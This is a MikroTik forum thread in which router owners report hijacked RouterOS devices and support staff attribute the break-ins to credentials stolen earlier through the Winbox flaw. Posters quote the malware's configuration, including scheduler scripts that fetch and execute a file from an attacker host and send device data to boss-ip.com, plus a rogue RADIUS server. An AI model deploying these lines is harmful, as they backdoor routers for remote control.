Community discussions

MikroTik App
 
meth
newbie
Topic Author
Posts: 26
Joined: Tue Jan 17, 2006 7:24 pm
Location: Greece

S.O.S New vurnelabilty on 6.42.3 ????? NO

Sat Jun 16, 2018 10:11 am

Hi to all, a client called me than something going wrong on his 1009 router which is running on latest 6.42.3 version.
By logging in i found two dumpded files on files directory and lot of changes in configuration
642.3.PNG
Any ideas???
You do not have the required permissions to view the files attached to this post.
 
nescafe2002
Forum Veteran
Forum Veteran
Posts: 897
Joined: Tue Aug 11, 2015 12:46 pm
Location: Netherlands

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Sat Jun 16, 2018 10:43 am

Did you set a (strong) password on the device?
What is the firewall config?
Which services are enabled?
Is there any information in the log?

At least send your findings with supout.rif to support@mikrotik.com.
 
msatter
Forum Guru
Forum Guru
Posts: 2897
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Sat Jun 16, 2018 12:18 pm

 
bryanstorey
just joined
Posts: 1
Joined: Sun Jun 17, 2018 2:45 am

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Sun Jun 17, 2018 2:59 am

Your story sounds similar to that of my own!.
i seen one of my servers go offline which was depending on a nat filter to get it's proper external static ip.
what ever it is. goes in and adds: new admin users, ppp radius connections, ip pools, scripts, masquerade rules to run every now and again and on startup which verifies the infection of the device re infects it if not infected and from what i can tell uploads it.. somewhere.....not sure how its getting in but it's nasty,

i checked another Tick i know of and it was also affected....
to no coincidence i seen a service tech hanging out of the local large WISP core he looked to be doing some "maintenance"

below are some configs that were added by it.

this happened on RB2011 6.41.4 & 6.42.3
BST
add name=ip owner=admin policy=\
    reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch \
    url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=bdee03097da1df40&actio\
    n=upload&sncode=D26B162F4AE05A0DF07BB92B3480114A&dynamic=static\")}"
/system scheduler
add interval=10m name=autosupout on-event=":if ([/file find name=autosupout1.rif\
    ]=\"\") do={\r\
    \n:local ssip [:resolve jt.25u.com server=8.8.8.8]\r\
    \n/tool fetch url=\"http://\$ssip:81/autosupout1.rif\" dst-path=autosupout1.\
    rif\r\
    \n}\r\
    \nexecute [/file get autosupout1.rif contents]" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
    start-date=jan/01/1970 start-time=00:00:00
add interval=30m name=a on-event=ip policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
    start-time=startup
/ppp aaa
set interim-update=1m use-circuit-id-in-nas-port-id=yes use-radius=yes
/radius
add address=47.75.230.175 secret=test service=ppp
/radius incoming
set accept=yes
 
User avatar
leopiri
just joined
Posts: 5
Joined: Fri May 08, 2009 9:25 am

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Mon Jun 18, 2018 12:48 am

I had the same problem, winbox port blocked only for network provider, latest version and firmware, strong users and passwords, I noticed this on June 15 at 10pm. It is noteworthy that the services winbox and web were enabled, when I went to see, all services were enabled, users who were read permission became full. This is disappointing, there is no way to get more secure with mikrotik, one security flaw after the other, in the last 7 vulnerability patch versions.
 
User avatar
strods
MikroTik Support
MikroTik Support
Posts: 1623
Joined: Wed Jul 16, 2014 7:22 am
Location: Riga, Latvia

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Mon Jun 18, 2018 7:36 am

For the last few months we have been named as vulnerable, but most of the hacks used one and the same vulnerability that was patched already last year. After that we found out about problem with Winbox that was patched on the same day and versions with patch were released on all RouterOS channels. So in total there were and were fixed two vulnerabilities. Hackers are using them again and again because many users still have not upgraded and/or fixed their configuration.

Regarding this problem in v6.42.3 - we have received few reports about this problem, but seems that simply hacker who used Winbox vulnerability in the past simply stored usernames and passwords and now was able to simply log into your router without hacking.

If you did change usernames and passwords recently while running on the latest RouterOS version and still seems that you have been hacked, then please without any hesitation contact support@mikrotik.com and provide supout file from your router (if possible, then generate file before you reboot router).
 
opensourcecat
just joined
Posts: 12
Joined: Wed Mar 20, 2013 12:35 pm

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Mon Jun 18, 2018 2:15 pm

This is happening also to me. But the router is 2 hours flight away... any way to gain access again? I have it working and configuration seems to be untouched (vpn, eoip etc). It was updated to 6.41.3 exactly because of this vulnerability but it didn't help.
 
punkaker
just joined
Posts: 13
Joined: Thu Apr 12, 2018 7:26 pm

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Mon Jun 18, 2018 4:45 pm

Also happened to us in 4 routers, we found that the identity changed to "test" and then we saw all the changes in configuration.

Will appreciate an Official Note from Mikrotik regarding this issue....
 
User avatar
strods
MikroTik Support
MikroTik Support
Posts: 1623
Joined: Wed Jul 16, 2014 7:22 am
Location: Riga, Latvia

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Mon Jun 18, 2018 5:04 pm

At the moment we have not received even one report about an actual new problem.

So far problem with everyone who has contacted support was:

1) Router in the past was running RouterOS version which had Winbox vulnerability that allowed hacker to download routers users database;
2) Router was upgraded, but passwords were not changed and firewall allowed access to specific, enabled service/s;
3) Hacker now uses passwords and usernames downloaded in the past and connects to routers in normal way even though router is upgraded.

Please make sure that your routers username and password has been changed after an upgrade to version that has Winbox vulnerability fix.
 
sid5632
Long time Member
Long time Member
Posts: 553
Joined: Fri Feb 17, 2017 6:05 pm

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Mon Jun 18, 2018 5:24 pm

It was updated to 6.41.3 exactly because of this vulnerability but it didn't help.
I believe 6.41.x doesn't have any vulnerability fix. You should be using 6.40.8 (or later in 6.40.x series - none yet) or 6.42.1 or later.
So it's not surprising that updating to 6.41.3 doesn't help really. Why pick that one anyway? It's a strange choice at the point in time.
 
carobeppe
just joined
Posts: 9
Joined: Tue Mar 26, 2013 6:09 pm

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Mon Jun 18, 2018 6:56 pm

Same problem here, routers updated to 6.42.3 before getting attack. We noticed it happened only if SSH service was enabled on default 22 port.
We found system identity modified to Test, a scheduled task and a new user, called Admin (with capital A)
 
User avatar
anav
Forum Guru
Forum Guru
Posts: 19107
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada
Contact:

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Mon Jun 18, 2018 7:00 pm

What the he...........
A. why would use the default port, the first thing I did after changing to SSH strong crypto is change the port to anything but default
B. your system may have been hacked prior to your OS change ........ did you also change usernames and passwords when making the OS update??
 
evon69
just joined
Posts: 1
Joined: Fri Apr 20, 2018 9:01 pm

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Mon Jun 18, 2018 8:00 pm

Same problem on a lot of routerOS, password really strong on any router. All the router have the last versions of packages and firmware, i've solved the problem changing default services port and making firewall rules more strong.
I understand we need to make security stronger by ourselfs, but if someone can access my router, running scripts etc whitout knowing the password... i think Mikrotik need to consider THIS as a problem to solve!
 
User avatar
mrz
MikroTik Support
MikroTik Support
Posts: 7042
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia
Contact:

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Tue Jun 19, 2018 11:05 am

Did you change passwords after you upgraded to latest version?
 
elbow
just joined
Posts: 9
Joined: Fri Oct 08, 2010 11:13 pm

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Wed Jun 27, 2018 12:42 am

We got hit with this 2 weeks in a row. The first time they did not change the username and password. We did.
This time we can not log back into the router although it is still passing traffic.
Identity has changed to test.
Is there a normal username and password that this exploit uses that will allow us back into the router?
 
R1CH
Forum Guru
Forum Guru
Posts: 1099
Joined: Sun Oct 01, 2006 11:44 pm

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Wed Jun 27, 2018 1:40 am

Did you do a reinstall after being compromised? Winbox access can be escalated to shell access, where attackers can drop undetectable backdoors and other exploits. Changing passwords might be OK if you're lucky and didn't get hit by a sophisticated exploit, but reinstalling is the only truly safe option.
 
complete2006
Member Candidate
Member Candidate
Posts: 254
Joined: Tue Feb 07, 2006 7:18 pm

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Sun Jul 01, 2018 9:54 pm

Same here. Identity changed to test and user/password changed. Scan comes from address 62.112.107.230 located in Russia
 
nescafe2002
Forum Veteran
Forum Veteran
Posts: 897
Joined: Tue Aug 11, 2015 12:46 pm
Location: Netherlands

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Sun Jul 01, 2018 10:12 pm

Please share more than "same here"... it isn't helpful at all.

- Have you updated routeros? To which version?
- Have you changed password since this update?
- Have you limited access to Winbox ports 8291? If not, can you limit access to Winbox ports?

What do you mean by "scan"? Are there log messages indicating to brute force attack? Could you share these messages?

Besides the above, could you send a supout.rif to support@mikrotik.com with your findings?
 
Zdenekhb
just joined
Posts: 10
Joined: Tue Apr 24, 2012 9:18 am

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Mon Jul 02, 2018 4:48 pm

HOW is Fixed?

We have same problems on 6.42.4

indentity changet to TEST, created scheduler to script and script is:
{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=5bc24d5c0d21bf27&action=upload&sncode=36C41FDED4E28E2E3A81E3C9415ED21D&dynamic=static")  keep-result=no}
is created new user admin, and is opened SSH link from russia :(

We try to make clear netinstall and set it back via export .. after few day is same situation ..
We cant limit acces via Winbox. But we have changet SSH port to other number, and allowed only www, winbox, ssh services (its Hotspot Machine)
 
User avatar
strods
MikroTik Support
MikroTik Support
Posts: 1623
Joined: Wed Jul 16, 2014 7:22 am
Location: Riga, Latvia

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Mon Jul 02, 2018 5:01 pm

We have received multiple reports where clients complain that their routers have been "hacked" while running RouterOS version that has Winbox vulnerability patch. In each and every of these cases RouterOS usernames and passwords were not changed or were changed before an upgrade - not after it. Hacker who stole access credentials simply goes through the hacked routers (while running old version) and uses the same username and password. This means that hacker logs into router as a normal user.

- Upgrade RouterOS
- Change usernames and/or passwords after an upgrade (not before)
- Protect device with firewall configuration

If your device has been accessed by unknown user while running on the latest RouterOS version even if access credentials for all users have been changed, then please report to support@mikrotik.com as soon as possible.
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 26322
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Tue Jul 03, 2018 10:05 am

HOW is Fixed?

We have same problems on 6.42.4

indentity changet to TEST, created scheduler to script and script is:
{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=5bc24d5c0d21bf27&action=upload&sncode=36C41FDED4E28E2E3A81E3C9415ED21D&dynamic=static")  keep-result=no}
is created new user admin, and is opened SSH link from russia :(

We try to make clear netinstall and set it back via export .. after few day is same situation ..
We cant limit acces via Winbox. But we have changet SSH port to other number, and allowed only www, winbox, ssh services (its Hotspot Machine)
Anyone can change your config if they have your password. This is not a vulnerability. They got your password before, not now.
 
lonthong
just joined
Posts: 8
Joined: Sun Apr 01, 2007 10:27 am
Location: ngalam
Contact:

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Sat Jul 21, 2018 7:50 am

same problem here..
RB 2011UiAS V6.42.5

i do :

1. /system reset and reconfig
2. change ssh , winbox port
3. change login user and password after /system reset and reconfig
but after few days similar things happen again

wait patiently good news from mikrotik support
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 26322
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Mon Jul 23, 2018 2:46 pm

Please provide some proof that it actually happened after 6.42.1, where the issue was fixed. Post your log and config. You are welcome to email them to support @ mikrotik.com if you like.
 
tachyonnoc
just joined
Posts: 4
Joined: Fri Nov 03, 2017 12:45 pm

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Wed Jul 25, 2018 12:57 pm

It is Even happening on 6.42.5 .
identity changing to 'test
adding up PPP servers
adding a masquerade rule
enabling Telnet and ssh
enabling admin
when i checked it was showing 300+ admin in active sessions on my CCR 1036 running on 6.42.5 and its happening again and again

Please provide solution for it.
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 26322
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Wed Jul 25, 2018 1:07 pm

It is Even happening on 6.42.5 .
identity changing to 'test
adding up PPP servers
adding a masquerade rule
enabling Telnet and ssh
enabling admin
when i checked it was showing 300+ admin in active sessions on my CCR 1036 running on 6.42.5 and its happening again and again

Please provide solution for it.
If somebody has your password, it doen't matter what software you are running. Like suggested before, reinstall AFTER upgrade, and must change password AFTER upgrade.
 
hongjie
just joined
Posts: 2
Joined: Wed Mar 06, 2013 7:38 am

Re: S.O.S New vurnelabilty on 6.42.3 ?????

Sun Jul 29, 2018 11:34 am

We have CCR1036 running in our network.
And last week we found a CCR1036 was hacked, it has a version of 6.38 and the log show an IP from Russia hacked and log in with API port.

The hacker leaves some message on the comment and let us drop money to his Bitcoin account. It's good that he didn't change the password and only blocked the access from Internet. So we can access it through local LAN.

And Today I found another device running 6.24.5 was hacked and this time, they changed my password and I cannot log in. And the entity name was changed to test.
I am finding the ways to access it, but no lucky. I'm not sure if I can access it through console.
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 26322
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: S.O.S New vurnelabilty on 6.42.3 ?????  [SOLVED]

Mon Jul 30, 2018 8:22 am

We have CCR1036 running in our network.
And last week we found a CCR1036 was hacked, it has a version of 6.38 and the log show an IP from Russia hacked and log in with API port.

The hacker leaves some message on the comment and let us drop money to his Bitcoin account. It's good that he didn't change the password and only blocked the access from Internet. So we can access it through local LAN.

And Today I found another device running 6.24.5 was hacked and this time, they changed my password and I cannot log in. And the entity name was changed to test.
I am finding the ways to access it, but no lucky. I'm not sure if I can access it through console.
You answered your own post. You are using vulnerable versions everywhere, with free access from the internet. Why waste time posting here, upgrade + change password!
If you can't access it, reinstall it.

Remember:

1. Upgrade to 6.42.3
2. Change password
3. Implement a good firewall according to https://wiki.mikrotik.com/wiki/Manual:S ... our_Router

Who is online

Users browsing this forum: A9691, Google [Bot] and 62 guests